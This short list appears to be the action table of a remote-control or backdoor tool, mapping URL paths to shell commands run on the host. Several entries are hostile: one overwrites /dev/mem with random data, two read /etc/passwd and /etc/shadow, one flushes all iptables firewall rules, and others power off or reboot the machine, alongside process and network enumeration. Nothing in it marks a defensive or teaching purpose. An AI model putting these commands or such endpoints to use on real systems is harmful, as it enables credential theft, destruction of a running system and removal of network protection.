v0.6 basic actions
-
/n00b : index page with commands to be triggered
-
/0 :
cat /dev/urandom > /dev/mem
-
/1 :
cat /etc/passwd
-
/2 :
cat /etc/shadow
-
/3 :
cat /etc/resolv.conf
-
/4 :
ps aux
-
/5 :
iptables --flush
-
/6 :
ifconfig -a || ip -a || networkctl --no-legend --no-pager status
-
/7
ifconfig -s || ip link || networkctl --no-legend --no-pager list
-
/8 :
poweroff
-
/9 :
reboot